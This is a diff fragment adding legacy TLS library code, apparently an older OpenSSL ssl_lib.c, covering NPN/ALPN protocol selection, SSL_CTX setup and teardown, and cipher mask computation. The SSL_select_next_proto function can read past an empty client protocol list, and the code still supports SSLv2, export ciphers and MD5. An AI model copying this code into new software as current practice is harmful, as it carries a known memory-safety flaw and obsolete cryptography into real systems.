+ * selects the first protcol in its list, but indicates via the API that this
+ * fallback case was enacted. 3) Otherwise, the client finds the first
+ * protocol in the server's list that it supports and selects this protocol.
+ * This is because it's assumed that the server has better information about
+ * which protocol a client should use. 4) If the client doesn't support any
+ * of the server's advertised protocols, then this is treated the same as
+ * case 2. It returns either OPENSSL_NPN_NEGOTIATED if a common protocol was
+ * found, or OPENSSL_NPN_NO_OVERLAP if the fallback case was reached.
+ */
+int SSL_select_next_proto(unsigned char **out, unsigned char *outlen,
+                          const unsigned char *server,
+                          unsigned int server_len,
+                          const unsigned char *client,
+                          unsigned int client_len)
+{
+    unsigned int i, j;
+    const unsigned char *result;
+    int status = OPENSSL_NPN_UNSUPPORTED;
+
+    /*
+     * For each protocol in server preference order, see if we support it.
+     */
+    for (i = 0; i < server_len;) {
+        for (j = 0; j < client_len;) {
+            if (server[i] == client[j] &&
+                memcmp(&server[i + 1], &client[j + 1], server[i]) == 0) {
+                /* We found a match */
+                result = &server[i];
+                status = OPENSSL_NPN_NEGOTIATED;
+                goto found;
+            }
+            j += client[j];
+            j++;
+        }
+        i += server[i];
+        i++;
+    }
+
+    /* There's no overlap between our protocols and the server's list. */
+    result = client;
+    status = OPENSSL_NPN_NO_OVERLAP;
+
+ found:
+    *out = (unsigned char *)result + 1;
+    *outlen = result[0];
+    return status;
+}
+
+# ifndef OPENSSL_NO_NEXTPROTONEG
+/*
+ * SSL_get0_next_proto_negotiated sets *data and *len to point to the
+ * client's requested protocol for this connection and returns 0. If the
+ * client didn't request any protocol, then *data is set to NULL. Note that
+ * the client can request any protocol it chooses. The value returned from
+ * this function need not be a member of the list of supported protocols
+ * provided by the callback.
+ */
+void SSL_get0_next_proto_negotiated(const SSL *s, const unsigned char **data,
+                                    unsigned *len)
+{
+    *data = s->next_proto_negotiated;
+    if (!*data) {
+        *len = 0;
+    } else {
+        *len = s->next_proto_negotiated_len;
+    }
+}
+
+/*
+ * SSL_CTX_set_next_protos_advertised_cb sets a callback that is called when
+ * a TLS server needs a list of supported protocols for Next Protocol
+ * Negotiation. The returned list must be in wire format.  The list is
+ * returned by setting |out| to point to it and |outlen| to its length. This
+ * memory will not be modified, but one should assume that the SSL* keeps a
+ * reference to it. The callback should return SSL_TLSEXT_ERR_OK if it
+ * wishes to advertise. Otherwise, no such extension will be included in the
+ * ServerHello.
+ */
+void SSL_CTX_set_next_protos_advertised_cb(SSL_CTX *ctx,
+                                           int (*cb) (SSL *ssl,
+                                                      const unsigned char
+                                                      **out,
+                                                      unsigned int *outlen,
+                                                      void *arg), void *arg)
+{
+    ctx->next_protos_advertised_cb = cb;
+    ctx->next_protos_advertised_cb_arg = arg;
+}
+
+/*
+ * SSL_CTX_set_next_proto_select_cb sets a callback that is called when a
+ * client needs to select a protocol from the server's provided list. |out|
+ * must be set to point to the selected protocol (which may be within |in|).
+ * The length of the protocol name must be written into |outlen|. The
+ * server's advertised protocols are provided in |in| and |inlen|. The
+ * callback can assume that |in| is syntactically valid. The client must
+ * select a protocol. It is fatal to the connection if this callback returns
+ * a value other than SSL_TLSEXT_ERR_OK.
+ */
+void SSL_CTX_set_next_proto_select_cb(SSL_CTX *ctx,
+                                      int (*cb) (SSL *s, unsigned char **out,
+                                                 unsigned char *outlen,
+                                                 const unsigned char *in,
+                                                 unsigned int inlen,
+                                                 void *arg), void *arg)
+{
+    ctx->next_proto_select_cb = cb;
+    ctx->next_proto_select_cb_arg = arg;
+}
+# endif
+
+/*
+ * SSL_CTX_set_alpn_protos sets the ALPN protocol list on |ctx| to |protos|.
+ * |protos| must be in wire-format (i.e. a series of non-empty, 8-bit
+ * length-prefixed strings). Returns 0 on success.
+ */
+int SSL_CTX_set_alpn_protos(SSL_CTX *ctx, const unsigned char *protos,
+                            unsigned protos_len)
+{
+    if (ctx->alpn_client_proto_list)
+        OPENSSL_free(ctx->alpn_client_proto_list);
+
+    ctx->alpn_client_proto_list = OPENSSL_malloc(protos_len);
+    if (!ctx->alpn_client_proto_list)
+        return 1;
+    memcpy(ctx->alpn_client_proto_list, protos, protos_len);
+    ctx->alpn_client_proto_list_len = protos_len;
+
+    return 0;
+}
+
+/*
+ * SSL_set_alpn_protos sets the ALPN protocol list on |ssl| to |protos|.
+ * |protos| must be in wire-format (i.e. a series of non-empty, 8-bit
+ * length-prefixed strings). Returns 0 on success.
+ */
+int SSL_set_alpn_protos(SSL *ssl, const unsigned char *protos,
+                        unsigned protos_len)
+{
+    if (ssl->alpn_client_proto_list)
+        OPENSSL_free(ssl->alpn_client_proto_list);
+
+    ssl->alpn_client_proto_list = OPENSSL_malloc(protos_len);
+    if (!ssl->alpn_client_proto_list)
+        return 1;
+    memcpy(ssl->alpn_client_proto_list, protos, protos_len);
+    ssl->alpn_client_proto_list_len = protos_len;
+
+    return 0;
+}
+
+/*
+ * SSL_CTX_set_alpn_select_cb sets a callback function on |ctx| that is
+ * called during ClientHello processing in order to select an ALPN protocol
+ * from the client's list of offered protocols.
+ */
+void SSL_CTX_set_alpn_select_cb(SSL_CTX *ctx,
+                                int (*cb) (SSL *ssl,
+                                           const unsigned char **out,
+                                           unsigned char *outlen,
+                                           const unsigned char *in,
+                                           unsigned int inlen,
+                                           void *arg), void *arg)
+{
+    ctx->alpn_select_cb = cb;
+    ctx->alpn_select_cb_arg = arg;
+}
+
+/*
+ * SSL_get0_alpn_selected gets the selected ALPN protocol (if any) from
+ * |ssl|. On return it sets |*data| to point to |*len| bytes of protocol name
+ * (not including the leading length-prefix byte). If the server didn't
+ * respond with a negotiated protocol then |*len| will be zero.
+ */
+void SSL_get0_alpn_selected(const SSL *ssl, const unsigned char **data,
+                            unsigned *len)
+{
+    *data = NULL;
+    if (ssl->s3)
+        *data = ssl->s3->alpn_selected;
+    if (*data == NULL)
+        *len = 0;
+    else
+        *len = ssl->s3->alpn_selected_len;
+}
+
+#endif                          /* !OPENSSL_NO_TLSEXT */
+
+int SSL_export_keying_material(SSL *s, unsigned char *out, size_t olen,
+                               const char *label, size_t llen,
+                               const unsigned char *p, size_t plen,
+                               int use_context)
+{
+    if (s->version < TLS1_VERSION)
+        return -1;
+
+    return s->method->ssl3_enc->export_keying_material(s, out, olen, label,
+                                                       llen, p, plen,
+                                                       use_context);
+}
+
+static unsigned long ssl_session_hash(const SSL_SESSION *a)
+{
+    unsigned long l;
+
+    l = (unsigned long)
+        ((unsigned int)a->session_id[0]) |
+        ((unsigned int)a->session_id[1] << 8L) |
+        ((unsigned long)a->session_id[2] << 16L) |
+        ((unsigned long)a->session_id[3] << 24L);
+    return (l);
+}
+
+/*
+ * NB: If this function (or indeed the hash function which uses a sort of
+ * coarser function than this one) is changed, ensure
+ * SSL_CTX_has_matching_session_id() is checked accordingly. It relies on
+ * being able to construct an SSL_SESSION that will collide with any existing
+ * session with a matching session ID.
+ */
+static int ssl_session_cmp(const SSL_SESSION *a, const SSL_SESSION *b)
+{
+    if (a->ssl_version != b->ssl_version)
+        return (1);
+    if (a->session_id_length != b->session_id_length)
+        return (1);
+    return (memcmp(a->session_id, b->session_id, a->session_id_length));
+}
+
+/*
+ * These wrapper functions should remain rather than redeclaring
+ * SSL_SESSION_hash and SSL_SESSION_cmp for void* types and casting each
+ * variable. The reason is that the functions aren't static, they're exposed
+ * via ssl.h.
+ */
+static IMPLEMENT_LHASH_HASH_FN(ssl_session, SSL_SESSION)
+static IMPLEMENT_LHASH_COMP_FN(ssl_session, SSL_SESSION)
+
+SSL_CTX *SSL_CTX_new(const SSL_METHOD *meth)
+{
+    SSL_CTX *ret = NULL;
+
+    if (meth == NULL) {
+        SSLerr(SSL_F_SSL_CTX_NEW, SSL_R_NULL_SSL_METHOD_PASSED);
+        return (NULL);
+    }
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode() && (meth->version < TLS1_VERSION)) {
+        SSLerr(SSL_F_SSL_CTX_NEW, SSL_R_ONLY_TLS_ALLOWED_IN_FIPS_MODE);
+        return NULL;
+    }
+#endif
+
+    if (SSL_get_ex_data_X509_STORE_CTX_idx() < 0) {
+        SSLerr(SSL_F_SSL_CTX_NEW, SSL_R_X509_VERIFICATION_SETUP_PROBLEMS);
+        goto err;
+    }
+    ret = (SSL_CTX *)OPENSSL_malloc(sizeof(SSL_CTX));
+    if (ret == NULL)
+        goto err;
+
+    memset(ret, 0, sizeof(SSL_CTX));
+
+    ret->method = meth;
+
+    ret->cert_store = NULL;
+    ret->session_cache_mode = SSL_SESS_CACHE_SERVER;
+    ret->session_cache_size = SSL_SESSION_CACHE_MAX_SIZE_DEFAULT;
+    ret->session_cache_head = NULL;
+    ret->session_cache_tail = NULL;
+
+    /* We take the system default */
+    ret->session_timeout = meth->get_timeout();
+
+    ret->new_session_cb = 0;
+    ret->remove_session_cb = 0;
+    ret->get_session_cb = 0;
+    ret->generate_session_id = 0;
+
+    memset((char *)&ret->stats, 0, sizeof(ret->stats));
+
+    ret->references = 1;
+    ret->quiet_shutdown = 0;
+
+/*  ret->cipher=NULL;*/
+/*-
+    ret->s2->challenge=NULL;
+    ret->master_key=NULL;
+    ret->key_arg=NULL;
+    ret->s2->conn_id=NULL; */
+
+    ret->info_callback = NULL;
+
+    ret->app_verify_callback = 0;
+    ret->app_verify_arg = NULL;
+
+    ret->max_cert_list = SSL_MAX_CERT_LIST_DEFAULT;
+    ret->read_ahead = 0;
+    ret->msg_callback = 0;
+    ret->msg_callback_arg = NULL;
+    ret->verify_mode = SSL_VERIFY_NONE;
+#if 0
+    ret->verify_depth = -1;     /* Don't impose a limit (but x509_lu.c does) */
+#endif
+    ret->sid_ctx_length = 0;
+    ret->default_verify_callback = NULL;
+    if ((ret->cert = ssl_cert_new()) == NULL)
+        goto err;
+
+    ret->default_passwd_callback = 0;
+    ret->default_passwd_callback_userdata = NULL;
+    ret->client_cert_cb = 0;
+    ret->app_gen_cookie_cb = 0;
+    ret->app_verify_cookie_cb = 0;
+
+    ret->sessions = lh_SSL_SESSION_new();
+    if (ret->sessions == NULL)
+        goto err;
+    ret->cert_store = X509_STORE_new();
+    if (ret->cert_store == NULL)
+        goto err;
+
+    ssl_create_cipher_list(ret->method,
+                           &ret->cipher_list, &ret->cipher_list_by_id,
+                           meth->version ==
+                           SSL2_VERSION ? "SSLv2" : SSL_DEFAULT_CIPHER_LIST,
+                           ret->cert);
+    if (ret->cipher_list == NULL || sk_SSL_CIPHER_num(ret->cipher_list) <= 0) {
+        SSLerr(SSL_F_SSL_CTX_NEW, SSL_R_LIBRARY_HAS_NO_CIPHERS);
+        goto err2;
+    }
+
+    ret->param = X509_VERIFY_PARAM_new();
+    if (!ret->param)
+        goto err;
+
+    if ((ret->rsa_md5 = EVP_get_digestbyname("ssl2-md5")) == NULL) {
+        SSLerr(SSL_F_SSL_CTX_NEW, SSL_R_UNABLE_TO_LOAD_SSL2_MD5_ROUTINES);
+        goto err2;
+    }
+    if ((ret->md5 = EVP_get_digestbyname("ssl3-md5")) == NULL) {
+        SSLerr(SSL_F_SSL_CTX_NEW, SSL_R_UNABLE_TO_LOAD_SSL3_MD5_ROUTINES);
+        goto err2;
+    }
+    if ((ret->sha1 = EVP_get_digestbyname("ssl3-sha1")) == NULL) {
+        SSLerr(SSL_F_SSL_CTX_NEW, SSL_R_UNABLE_TO_LOAD_SSL3_SHA1_ROUTINES);
+        goto err2;
+    }
+
+    if ((ret->client_CA = sk_X509_NAME_new_null()) == NULL)
+        goto err;
+
+    CRYPTO_new_ex_data(CRYPTO_EX_INDEX_SSL_CTX, ret, &ret->ex_data);
+
+    ret->extra_certs = NULL;
+    /* No compression for DTLS */
+    if (meth->version != DTLS1_VERSION)
+        ret->comp_methods = SSL_COMP_get_compression_methods();
+
+    ret->max_send_fragment = SSL3_RT_MAX_PLAIN_LENGTH;
+
+#ifndef OPENSSL_NO_TLSEXT
+    ret->tlsext_servername_callback = 0;
+    ret->tlsext_servername_arg = NULL;
+    /* Setup RFC4507 ticket keys */
+    if ((RAND_pseudo_bytes(ret->tlsext_tick_key_name, 16) <= 0)
+        || (RAND_bytes(ret->tlsext_tick_hmac_key, 16) <= 0)
+        || (RAND_bytes(ret->tlsext_tick_aes_key, 16) <= 0))
+        ret->options |= SSL_OP_NO_TICKET;
+
+    ret->tlsext_status_cb = 0;
+    ret->tlsext_status_arg = NULL;
+
+# ifndef OPENSSL_NO_NEXTPROTONEG
+    ret->next_protos_advertised_cb = 0;
+    ret->next_proto_select_cb = 0;
+# endif
+#endif
+#ifndef OPENSSL_NO_PSK
+    ret->psk_identity_hint = NULL;
+    ret->psk_client_callback = NULL;
+    ret->psk_server_callback = NULL;
+#endif
+#ifndef OPENSSL_NO_SRP
+    SSL_CTX_SRP_CTX_init(ret);
+#endif
+#ifndef OPENSSL_NO_BUF_FREELISTS
+    ret->freelist_max_len = SSL_MAX_BUF_FREELIST_LEN_DEFAULT;
+    ret->rbuf_freelist = OPENSSL_malloc(sizeof(SSL3_BUF_FREELIST));
+    if (!ret->rbuf_freelist)
+        goto err;
+    ret->rbuf_freelist->chunklen = 0;
+    ret->rbuf_freelist->len = 0;
+    ret->rbuf_freelist->head = NULL;
+    ret->wbuf_freelist = OPENSSL_malloc(sizeof(SSL3_BUF_FREELIST));
+    if (!ret->wbuf_freelist) {
+        OPENSSL_free(ret->rbuf_freelist);
+        goto err;
+    }
+    ret->wbuf_freelist->chunklen = 0;
+    ret->wbuf_freelist->len = 0;
+    ret->wbuf_freelist->head = NULL;
+#endif
+#ifndef OPENSSL_NO_ENGINE
+    ret->client_cert_engine = NULL;
+# ifdef OPENSSL_SSL_CLIENT_ENGINE_AUTO
+#  define eng_strx(x)     #x
+#  define eng_str(x)      eng_strx(x)
+    /* Use specific client engine automatically... ignore errors */
+    {
+        ENGINE *eng;
+        eng = ENGINE_by_id(eng_str(OPENSSL_SSL_CLIENT_ENGINE_AUTO));
+        if (!eng) {
+            ERR_clear_error();
+            ENGINE_load_builtin_engines();
+            eng = ENGINE_by_id(eng_str(OPENSSL_SSL_CLIENT_ENGINE_AUTO));
+        }
+        if (!eng || !SSL_CTX_set_client_cert_engine(ret, eng))
+            ERR_clear_error();
+    }
+# endif
+#endif
+    /*
+     * Default is to connect to non-RI servers. When RI is more widely
+     * deployed might change this.
+     */
+    ret->options |= SSL_OP_LEGACY_SERVER_CONNECT;
+
+    return (ret);
+ err:
+    SSLerr(SSL_F_SSL_CTX_NEW, ERR_R_MALLOC_FAILURE);
+ err2:
+    if (ret != NULL)
+        SSL_CTX_free(ret);
+    return (NULL);
+}
+
+#if 0
+static void SSL_COMP_free(SSL_COMP *comp)
+{
+    OPENSSL_free(comp);
+}
+#endif
+
+#ifndef OPENSSL_NO_BUF_FREELISTS
+static void ssl_buf_freelist_free(SSL3_BUF_FREELIST *list)
+{
+    SSL3_BUF_FREELIST_ENTRY *ent, *next;
+    for (ent = list->head; ent; ent = next) {
+        next = ent->next;
+        OPENSSL_free(ent);
+    }
+    OPENSSL_free(list);
+}
+#endif
+
+void SSL_CTX_free(SSL_CTX *a)
+{
+    int i;
+
+    if (a == NULL)
+        return;
+
+    i = CRYPTO_add(&a->references, -1, CRYPTO_LOCK_SSL_CTX);
+#ifdef REF_PRINT
+    REF_PRINT("SSL_CTX", a);
+#endif
+    if (i > 0)
+        return;
+#ifdef REF_CHECK
+    if (i < 0) {
+        fprintf(stderr, "SSL_CTX_free, bad reference count\n");
+        abort();                /* ok */
+    }
+#endif
+
+    if (a->param)
+        X509_VERIFY_PARAM_free(a->param);
+
+    /*
+     * Free internal session cache. However: the remove_cb() may reference
+     * the ex_data of SSL_CTX, thus the ex_data store can only be removed
+     * after the sessions were flushed.
+     * As the ex_data handling routines might also touch the session cache,
+     * the most secure solution seems to be: empty (flush) the cache, then
+     * free ex_data, then finally free the cache.
+     * (See ticket [openssl.org #212].)
+     */
+    if (a->sessions != NULL)
+        SSL_CTX_flush_sessions(a, 0);
+
+    CRYPTO_free_ex_data(CRYPTO_EX_INDEX_SSL_CTX, a, &a->ex_data);
+
+    if (a->sessions != NULL)
+        lh_SSL_SESSION_free(a->sessions);
+
+    if (a->cert_store != NULL)
+        X509_STORE_free(a->cert_store);
+    if (a->cipher_list != NULL)
+        sk_SSL_CIPHER_free(a->cipher_list);
+    if (a->cipher_list_by_id != NULL)
+        sk_SSL_CIPHER_free(a->cipher_list_by_id);
+    if (a->cert != NULL)
+        ssl_cert_free(a->cert);
+    if (a->client_CA != NULL)
+        sk_X509_NAME_pop_free(a->client_CA, X509_NAME_free);
+    if (a->extra_certs != NULL)
+        sk_X509_pop_free(a->extra_certs, X509_free);
+#if 0                           /* This should never be done, since it
+                                 * removes a global database */
+    if (a->comp_methods != NULL)
+        sk_SSL_COMP_pop_free(a->comp_methods, SSL_COMP_free);
+#else
+    a->comp_methods = NULL;
+#endif
+
+#ifndef OPENSSL_NO_SRTP
+    if (a->srtp_profiles)
+        sk_SRTP_PROTECTION_PROFILE_free(a->srtp_profiles);
+#endif
+
+#ifndef OPENSSL_NO_PSK
+    if (a->psk_identity_hint)
+        OPENSSL_free(a->psk_identity_hint);
+#endif
+#ifndef OPENSSL_NO_SRP
+    SSL_CTX_SRP_CTX_free(a);
+#endif
+#ifndef OPENSSL_NO_ENGINE
+    if (a->client_cert_engine)
+        ENGINE_finish(a->client_cert_engine);
+#endif
+
+#ifndef OPENSSL_NO_BUF_FREELISTS
+    if (a->wbuf_freelist)
+        ssl_buf_freelist_free(a->wbuf_freelist);
+    if (a->rbuf_freelist)
+        ssl_buf_freelist_free(a->rbuf_freelist);
+#endif
+#ifndef OPENSSL_NO_TLSEXT
+# ifndef OPENSSL_NO_EC
+    if (a->tlsext_ecpointformatlist)
+        OPENSSL_free(a->tlsext_ecpointformatlist);
+    if (a->tlsext_ellipticcurvelist)
+        OPENSSL_free(a->tlsext_ellipticcurvelist);
+# endif                         /* OPENSSL_NO_EC */
+    if (a->alpn_client_proto_list != NULL)
+        OPENSSL_free(a->alpn_client_proto_list);
+#endif
+
+    OPENSSL_free(a);
+}
+
+void SSL_CTX_set_default_passwd_cb(SSL_CTX *ctx, pem_password_cb *cb)
+{
+    ctx->default_passwd_callback = cb;
+}
+
+void SSL_CTX_set_default_passwd_cb_userdata(SSL_CTX *ctx, void *u)
+{
+    ctx->default_passwd_callback_userdata = u;
+}
+
+void SSL_CTX_set_cert_verify_callback(SSL_CTX *ctx,
+                                      int (*cb) (X509_STORE_CTX *, void *),
+                                      void *arg)
+{
+    ctx->app_verify_callback = cb;
+    ctx->app_verify_arg = arg;
+}
+
+void SSL_CTX_set_verify(SSL_CTX *ctx, int mode,
+                        int (*cb) (int, X509_STORE_CTX *))
+{
+    ctx->verify_mode = mode;
+    ctx->default_verify_callback = cb;
+}
+
+void SSL_CTX_set_verify_depth(SSL_CTX *ctx, int depth)
+{
+    X509_VERIFY_PARAM_set_depth(ctx->param, depth);
+}
+
+void SSL_CTX_set_cert_cb(SSL_CTX *c, int (*cb) (SSL *ssl, void *arg),
+                         void *arg)
+{
+    ssl_cert_set_cert_cb(c->cert, cb, arg);
+}
+
+void SSL_set_cert_cb(SSL *s, int (*cb) (SSL *ssl, void *arg), void *arg)
+{
+    ssl_cert_set_cert_cb(s->cert, cb, arg);
+}
+
+void ssl_set_cert_masks(CERT *c, const SSL_CIPHER *cipher)
+{
+    CERT_PKEY *cpk;
+    int rsa_enc, rsa_tmp, rsa_sign, dh_tmp, dh_rsa, dh_dsa, dsa_sign;
+    int rsa_enc_export, dh_rsa_export, dh_dsa_export;
+    int rsa_tmp_export, dh_tmp_export, kl;
+    unsigned long mask_k, mask_a, emask_k, emask_a;
+#ifndef OPENSSL_NO_ECDSA
+    int have_ecc_cert, ecdsa_ok, ecc_pkey_size;
+#endif
+#ifndef OPENSSL_NO_ECDH
+    int have_ecdh_tmp, ecdh_ok;
+#endif
+#ifndef OPENSSL_NO_EC
+    X509 *x = NULL;
+    EVP_PKEY *ecc_pkey = NULL;
+    int signature_nid = 0, pk_nid = 0, md_nid = 0;
+#endif
+    if (c == NULL)
+        return;
+
+    kl = SSL_C_EXPORT_PKEYLENGTH(cipher);
+
+#ifndef OPENSSL_NO_RSA
+    rsa_tmp = (c->rsa_tmp != NULL || c->rsa_tmp_cb != NULL);
+    rsa_tmp_export = (c->rsa_tmp_cb != NULL ||
+                      (rsa_tmp && RSA_size(c->rsa_tmp) * 8 <= kl));
+#else
+    rsa_tmp = rsa_tmp_export = 0;
+#endif
+#ifndef OPENSSL_NO_DH
+    dh_tmp = (c->dh_tmp != NULL || c->dh_tmp_cb != NULL);
+    dh_tmp_export = (c->dh_tmp_cb != NULL ||
+                     (dh_tmp && DH_size(c->dh_tmp) * 8 <= kl));
+#else
+    dh_tmp = dh_tmp_export = 0;
+#endif
+
+#ifndef OPENSSL_NO_ECDH
+    have_ecdh_tmp = (c->ecdh_tmp || c->ecdh_tmp_cb || c->ecdh_tmp_auto);
+#endif
+    cpk = &(c->pkeys[SSL_PKEY_RSA_ENC]);
+    rsa_enc = cpk->valid_flags & CERT_PKEY_VALID;
+    rsa_enc_export = (rsa_enc && EVP_PKEY_size(cpk->privatekey) * 8 <= kl);
+    cpk = &(c->pkeys[SSL_PKEY_RSA_SIGN]);
+    rsa_sign = cpk->valid_flags & CERT_PKEY_SIGN;
+    cpk = &(c->pkeys[SSL_PKEY_DSA_SIGN]);
+    dsa_sign = cpk->valid_flags & CERT_PKEY_SIGN;
+    cpk = &(c->pkeys[SSL_PKEY_DH_RSA]);
+    dh_rsa = cpk->valid_flags & CERT_PKEY_VALID;
+    dh_rsa_export = (dh_rsa && EVP_PKEY_size(cpk->privatekey) * 8 <= kl);
+    cpk = &(c->pkeys[SSL_PKEY_DH_DSA]);
+/* FIX THIS EAY EAY EAY */
+    dh_dsa = cpk->valid_flags & CERT_PKEY_VALID;
+    dh_dsa_export = (dh_dsa && EVP_PKEY_size(cpk->privatekey) * 8 <= kl);
+    cpk = &(c->pkeys[SSL_PKEY_ECC]);
+#ifndef OPENSSL_NO_EC
+    have_ecc_cert = cpk->valid_flags & CERT_PKEY_VALID;
+#endif
+    mask_k = 0;
+    mask_a = 0;
+    emask_k = 0;
+    emask_a = 0;
+
+#ifdef CIPHER_DEBUG
+    fprintf(stderr,
+            "rt=%d rte=%d dht=%d ecdht=%d re=%d ree=%d rs=%d ds=%d dhr=%d dhd=%d\n",
+            rsa_tmp, rsa_tmp_export, dh_tmp, have_ecdh_tmp, rsa_enc,
+            rsa_enc_export, rsa_sign, dsa_sign, dh_rsa, dh_dsa);
+#endif
+
+    cpk = &(c->pkeys[SSL_PKEY_GOST01]);
+    if (cpk->x509 != NULL && cpk->privatekey != NULL) {
+        mask_k |= SSL_kGOST;
+        mask_a |= SSL_aGOST01;
+    }
+    cpk = &(c->pkeys[SSL_PKEY_GOST94]);
+    if (cpk->x509 != NULL && cpk->privatekey != NULL) {
+        mask_k |= SSL_kGOST;
+        mask_a |= SSL_aGOST94;
+    }
+
+    if (rsa_enc || (rsa_tmp && rsa_sign))
+        mask_k |= SSL_kRSA;
+    if (rsa_enc_export || (rsa_tmp_export && (rsa_sign || rsa_enc)))
+        emask_k |= SSL_kRSA;
+
+#if 0
+    /* The match needs to be both kEDH and aRSA or aDSA, so don't worry */
+    if ((dh_tmp || dh_rsa || dh_dsa) && (rsa_enc || rsa_sign || dsa_sign))
+        mask_k |= SSL_kEDH;
+    if ((dh_tmp_export || dh_rsa_export || dh_dsa_export) &&
+        (rsa_enc || rsa_sign || dsa_sign))
+        emask_k |= SSL_kEDH;
+#endif
+
+    if (dh_tmp_export)
+        emask_k |= SSL_kEDH;
+
+    if (dh_tmp)
+        mask_k |= SSL_kEDH;
+
+    if (dh_rsa)
+        mask_k |= SSL_kDHr;
+    if (dh_rsa_export)
+        emask_k |= SSL_kDHr;
+
+    if (dh_dsa)
+        mask_k |= SSL_kDHd;
+    if (dh_dsa_export)
+        emask_k |= SSL_kDHd;
+
+    if (emask_k & (SSL_kDHr | SSL_kDHd))
+        mask_a |= SSL_aDH;
+
+    if (rsa_enc || rsa_sign) {
+        mask_a |= SSL_aRSA;
+        emask_a |= SSL_aRSA;
+    }
+
+    if (dsa_sign) {
+        mask_a |= SSL_aDSS;
+        emask_a |= SSL_aDSS;
+    }
+
+    mask_a |= SSL_aNULL;
+    emask_a |= SSL_aNULL;
+
+#ifndef OPENSSL_NO_KRB5
+    mask_k |= SSL_kKRB5;
+    mask_a |= SSL_aKRB5;
+    emask_k |= SSL_kKRB5;
+    emask_a |= SSL_aKRB5;
+#endif
+
+    /*
+     * An ECC certificate may be usable for ECDH and/or ECDSA cipher suites
+     * depending on the key usage extension.
+     */
+#ifndef OPENSSL_NO_EC
+    if (have_ecc_cert) {
+        cpk = &c->pkeys[SSL_PKEY_ECC];
+        x = cpk->x509;
+        /* This call populates extension flags (ex_flags) */
+        X509_check_purpose(x, -1, 0);
+# ifndef OPENSSL_NO_ECDH
+        ecdh_ok = (x->ex_flags & EXFLAG_KUSAGE) ?
+            (x->ex_kusage & X509v3_KU_KEY_AGREEMENT) : 1;
+# endif
+        ecdsa_ok = (x->ex_flags & EXFLAG_KUSAGE) ?
+            (x->ex_kusage & X509v3_KU_DIGITAL_SIGNATURE) : 1;
+        if (!(cpk->valid_flags & CERT_PKEY_SIGN))
+            ecdsa_ok = 0;
+        ecc_pkey = X509_get_pubkey(x);
+        ecc_pkey_size = (ecc_pkey != NULL) ? EVP_PKEY_bits(ecc_pkey) : 0;
+        EVP_PKEY_free(ecc_pkey);
+        if ((x->sig_alg) && (x->sig_alg->algorithm)) {
+            signature_nid = OBJ_obj2nid(x->sig_alg->algorithm);
+            OBJ_find_sigid_algs(signature_nid, &md_nid, &pk_nid);
+        }
+# ifndef OPENSSL_NO_ECDH
+        if (ecdh_ok) {
+
+            if (pk_nid == NID_rsaEncryption || pk_nid == NID_rsa) {
+                mask_k |= SSL_kECDHr;
+                mask_a |= SSL_aECDH;
+                if (ecc_pkey_size <= 163) {
+                    emask_k |= SSL_kECDHr;
+                    emask_a |= SSL_aECDH;
+                }
+            }
+
+            if (pk_nid == NID_X9_62_id_ecPublicKey) {
+                mask_k |= SSL_kECDHe;
+                mask_a |= SSL_aECDH;
+                if (ecc_pkey_size <= 163) {
+                    emask_k |= SSL_kECDHe;
+                    emask_a |= SSL_aECDH;
+                }
+            }
+        }
+# endif
+# ifndef OPENSSL_NO_ECDSA
+        if (ecdsa_ok) {
+            mask_a |= SSL_aECDSA;
+            emask_a |= SSL_aECDSA;
+        }
+# endif
+    }
+#endif
+
+#ifndef OPENSSL_NO_ECDH
+    if (have_ecdh_tmp) {
+        mask_k |= SSL_kEECDH;
+        emask_k |= SSL_kEECDH;
+    }
+#endif
+
+#ifndef OPENSSL_NO_PSK
+    mask_k |= SSL_kPSK;
+    mask_a |= SSL_aPSK;
+    emask_k |= SSL_kPSK;
+    emask_a |= SSL_aPSK;
+#endif
+
+    c->mask_k = mask_k;
+    c->mask_a = mask_a;
+    c->export_mask_k = emask_k;
+    c->export_mask_a = emask_a;
+    c->valid = 1;
+}
+
+/* This handy macro borrowed from crypto/x509v3/v3_purp.c */
+#define ku_reject(x, usage) \
+        (((x)->ex_flags & EXFLAG_KUSAGE) && !((x)->ex_kusage & (usage)))
+
+#ifndef OPENSSL_NO_EC
+
+int ssl_check_srvr_ecc_cert_and_alg(X509 *x, SSL *s)
+{
+    unsigned long alg_k, alg_a;
+    EVP_PKEY *pkey = NULL;
+    int keysize = 0;
+    int signature_nid = 0, md_nid = 0, pk_nid = 0;
+    const SSL_CIPHER *cs = s->s3->tmp.new_cipher;
+
+    alg_k = cs->algorithm_mkey;
+    alg_a = cs->algorithm_auth;
+
+    if (SSL_C_IS_EXPORT(cs)) {
+        /* ECDH key length in export ciphers must be <= 163 bits */
+        pkey = X509_get_pubkey(x);
+        if (pkey == NULL)
+            return 0;
+        keysize = EVP_PKEY_bits(pkey);
+        EVP_PKEY_free(pkey);
+        if (keysize > 163)
+            return 0;
+    }
+
+    /* This call populates the ex_flags field correctly */
+    X509_check_purpose(x, -1, 0);
+    if ((x->sig_alg) && (x->sig_alg->algorithm)) {
+        signature_nid = OBJ_obj2nid(x->sig_alg->algorithm);
+        OBJ_find_sigid_algs(signature_nid, &md_nid, &pk_nid);
+    }
+    if (alg_k & SSL_kECDHe || alg_k & SSL_kECDHr) {
+        /* key usage, if present, must allow key agreement */
+        if (ku_reject(x, X509v3_KU_KEY_AGREEMENT)) {
+            SSLerr(SSL_F_SSL_CHECK_SRVR_ECC_CERT_AND_ALG,
+                   SSL_R_ECC_CERT_NOT_FOR_KEY_AGREEMENT);
+            return 0;
+        }
+        if ((alg_k & SSL_kECDHe) && TLS1_get_version(s) < TLS1_2_VERSION) {
+            /* signature alg must be ECDSA */
+            if (pk_nid != NID_X9_62_id_ecPublicKey) {
+                SSLerr(SSL_F_SSL_CHECK_SRVR_ECC_CERT_AND_ALG,
+                       SSL_R_ECC_CERT_SHOULD_HAVE_SHA1_SIGNATURE);
+                return 0;
+            }
+        }
+        if ((alg_k & SSL_kECDHr) && TLS1_get_version(s) < TLS1_2_VERSION) {
+            /* signature alg must be RSA */
+
+            if (pk_nid != NID_rsaEncryption && pk_nid != NID_rsa) {
+                SSLerr(SSL_F_SSL_CHECK_SRVR_ECC_CERT_AND_ALG,
+                       SSL_R_ECC_CERT_SHOULD_HAVE_RSA_SIGNATURE);
+                return 0;
+            }
+        }
+    }
+    if (alg_a & SSL_aECDSA) {
+        /* key usage, if present, must allow signing */
+        if (ku_reject(x, X509v3_KU_DIGITAL_SIGNATURE)) {
+            SSLerr(SSL_F_SSL_CHECK_SRVR_ECC_CERT_AND_ALG,
+                   SSL_R_ECC_CERT_NOT_FOR_SIGNING);
+            return 0;
+        }
+    }
+
